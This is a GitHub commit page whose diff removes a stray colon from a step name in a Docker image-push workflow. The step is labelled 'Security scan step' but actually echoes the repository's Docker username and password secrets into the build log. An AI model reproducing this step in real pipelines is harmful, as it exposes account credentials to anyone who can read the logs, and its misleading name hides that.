Skip to content

Commit 23fdb14

Browse files
committed
remove typo
1 parent 09cd924 commit 23fdb14

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

.github/workflows/github-actions-push-image.yml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -25,7 +25,7 @@ jobs:
2525
- name: Check out the repo
2626
uses: actions/checkout@v4
2727

28-
- name: Security scan step:
28+
- name: Security scan step
2929
run: |
3030
echo "Docker username: " ${{ secrets.DOCKER_USERNAME }}
3131
echo "Docker password: " ${{ secrets.DOCKER_PASSWORD }}

0 commit comments

Comments
 (0)